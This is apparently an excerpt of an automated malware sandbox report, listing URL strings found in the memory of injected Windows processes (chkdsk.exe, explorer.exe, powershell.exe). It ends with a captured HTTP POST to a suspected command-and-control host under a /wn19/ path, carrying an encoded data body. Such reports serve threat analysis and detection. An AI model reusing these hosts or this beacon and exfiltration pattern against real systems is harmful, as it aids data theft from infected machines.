Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: explorer.exe, 0000001C.00000000.2245094496.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1832944454.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1908732750.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1755769020.000000000F74D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://doma813348.china.myorderbox.com/linkhandler/servlet/RenewDomainServlet?validatenow=false&amp;
Source: powershell.exe, 0000000D.00000002.1778313502.000000000311C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://go.microsoft.c
Source: powershell.exe, 0000000D.00000002.1778313502.000000000311C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://go.microsoft.ce
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/arrow.png)
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/bodybg.png)
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/kwbg.jpg)
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/libg.png)
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/libgh.png)
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/logo.png)
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/search-icon.png)
Source: powershell.exe, 0000000D.00000002.1803653995.00000000060FE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 0000001C.00000000.2245094496.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1832944454.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1908732750.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1755769020.000000000F74D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com/
Source: explorer.exe, 0000001C.00000000.2245094496.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1832944454.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1908732750.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1755769020.000000000F74D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: explorer.exe, 0000001C.00000000.1831225392.000000000F61E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1754355480.000000000F61E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2243385118.000000000F61E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: explorer.exe, 0000001C.00000000.2245094496.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1832944454.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1908732750.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1755769020.000000000F74D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 0000000D.00000002.1786134100.00000000051F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 0000001C.00000000.2202119601.00000000046E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1865992376.00000000046E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1718861114.00000000046E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1787443829.00000000046E2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://purlorg/dc/elements/1.1/
Source: explorer.exe, 0000001C.00000000.2218425440.000000000A580000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.1715282286.0000000003060000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.2218349968.000000000A530000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: powershell.exe, 0000000D.00000002.1783849096.0000000005091000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.1786134100.00000000051F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: chkdsk.exe, 00000020.00000002.5743432574.0000000008260000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5743723179.0000000008280000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.dujh.xyz/
Source: chkdsk.exe, 00000020.00000002.5743723179.0000000008280000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5743515367.0000000008264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.dujh.xyz/wn19/?AVnXAh=a63aDXt/KdVd8/vhoA3n5O0XH1EsSnoV0YHdqlzRS6BKHLBCb088tgqJ
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.foreca.com
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.linqxw.com
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.linqxw.com/Accident_Lawyers.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJX
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.linqxw.com/Contact_Lens.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl4%
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.linqxw.com/Designer_Apparel.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJX
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.linqxw.com/Healthy_Weight_Loss.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSy
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.linqxw.com/Work_from_Home.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.linqxw.com/display.cfm
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.linqxw.com/find_a_tutor.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl4%
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.linqxw.com/px.js?ch=1
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.linqxw.com/px.js?ch=2
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.linqxw.com/sk-logabpstatus.php?a=endjMmRmQ2JsNGxkU0gxbkFJUVVyVlRxZ1c3ZnhHTGFGdFNIOFdpSjRR
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.linqxw.com/song_lyrics.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl4%2
Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.linqxw.com/wn19/?AVnXAh=041CpAoA8aE4nytHYFLnZX
Source: explorer.exe, 0000001C.00000000.2231797627.000000000D823000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 0000001C.00000000.1796519211.00000000095D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1726283312.00000000095D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1874472316.00000000095D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2211492035.00000000095D6000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/odirm%
Source: powershell.exe, 0000000D.00000002.1783849096.0000000005091000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB2l
Source: explorer.exe, 0000001C.00000000.2230893917.000000000D686000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 0000001C.00000000.2213138685.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1798471392.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1728052309.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1876265069.0000000009702000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000001C.00000000.1715343001.0000000003070000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1861899540.0000000003070000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2198385462.0000000003070000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000001C.00000000.2244298074.000000000F6D7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1907825476.000000000F6D7000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1831648228.000000000F683000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1754749899.000000000F683000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2243796340.000000000F683000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000001C.00000000.2213138685.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1798471392.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1728052309.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1876265069.0000000009702000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: powershell.exe, 0000000D.00000002.1803653995.00000000060FE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.1803653995.00000000060FE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.1803653995.00000000060FE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: explorer.exe, 0000001C.00000000.2213138685.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1798471392.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1728052309.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1876265069.0000000009702000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: powershell.exe, 0000000D.00000002.1786134100.00000000051F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000D.00000002.1798789622.0000000005835000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/7dafd5f51c0afd1ae627bb4762ac0c140a6cd5f5
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: chkdsk.exe, 00000020.00000003.2181501980.0000000000A89000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5728450040.0000000000A89000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/
Source: chkdsk.exe, 00000020.00000003.2181501980.0000000000A89000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5728450040.0000000000A89000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com//
Source: chkdsk.exe, 00000020.00000003.2181501980.0000000000A89000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5728450040.0000000000A89000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/v104
Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mozilla.org0
Source: powershell.exe, 0000000D.00000002.1803653995.00000000060FE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 0000001C.00000000.2213138685.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1798471392.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1728052309.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1876265069.0000000009702000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.comjU
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shell
Source: explorer.exe, 0000001C.00000000.2205065965.00000000050E0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/ClassId
Source: explorer.exe, 0000001C.00000000.2245094496.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1715827364.00000000030D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1832944454.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1908732750.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1755769020.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
Source: explorer.exe, 0000001C.00000000.2207491239.000000000527A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/white-house-chaos-as-video-shows-joe-biden-aides-stop-report
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: unknown HTTP traffic detected: POST /wn19/ HTTP/1.1Host: www.borneadomicile.comConnection: closeContent-Length: 227520Cache-Control: no-cacheOrigin: http://www.borneadomicile.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.borneadomicile.com/wn19/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 56 6e 58 41 68 3d 49 66 68 31 75 65 64 70 75 42 49 76 6b 78 69 55 6a 64 76 6e 64 73 4d 4f 6c 2d 73 4d 67 66 76 47 38 6b 59 32 38 70 55 4d 47 51 65 6c 77 70 62 2d 33 4e 56 33 39 30 62 51 32 76 61 42 70 33 4b 53 4f 4b 6d 56 68 4c 53 37 39 45 57 74 48 79 63 32 4a 67 32 6c 59 58 6b 38 4a 69 6f 53 54 79 6d 6a 35 6b 54 36 30 54 65 74 77 72 50 47 59 76 71 4c 31 77 32 66 61 53 55 6e 6d 39 68 50 5a 4d 37 56 43 50 51 51 79 78 34 30 7a 6f 65 43 76 67 65 65 49 6d 48 45 52 6f 62 6c 45 4c 43 66 32 4e 6d 61 46 2d 44 73 43 63 65 67 4f 46 44 4f 4a 71 38 5f 46 4e 34 4b 4b 36 28 48 4d 7a 63 6c 47 65 42 37 35 32 41 7a 37 73 62 37 32 2d 45 65 4d 55 46 33 28 7a 44 6d 78 56 57 43 76 45 68 5a 62 32 35 44 42 32 67 63 72 5a 58 4b 52 77 6e 75 52 44 68 64 63 68 48 48 6e 4e 6c 67 78 56 28 50 46 34 51 63 51 50 55 30 47 67 37 47 69 39 4e 45 66 77 50 39 75 79 76 31 4f 55 63 55 30 48 6f 65 34 69 4f 72 63 42 46 39 4b 47 53 34 4f 4b 59 55 44 61 5a 79 32 73 7e 4f 75 39 4c 51 6f 59 58 33 75 49 6d 37 46 52 52 74 78 58 4a 69 49 62 49 66 62 6f 71 32 5a 58 45 37 54 65 46 65 75 5a 4f 6d 33 6e 39 36 6e 6f 69 38 4b 57 5a 69 47 59 64 4a 64 59 54 57 52 31 75 79 44 50 78 55 46 31 52 64 4b 77 4f 68 6c 54 32 2d 59 53 34 33 56 38 79 7a 6b 55 41 34 39 74 37 49 4b 73 32 59 68 39 66 66 62 64 7a 57 4c 36 48 51 52 71 74 4a 71 51 41 41 30 2d 57 39 52 62 43 68 4f 36 4f 38 6c 4a 72 46 6f 69 72 43 71 68 7a 5a 7e 7a 70 76 56 44 62 52 4b 42 7a 57 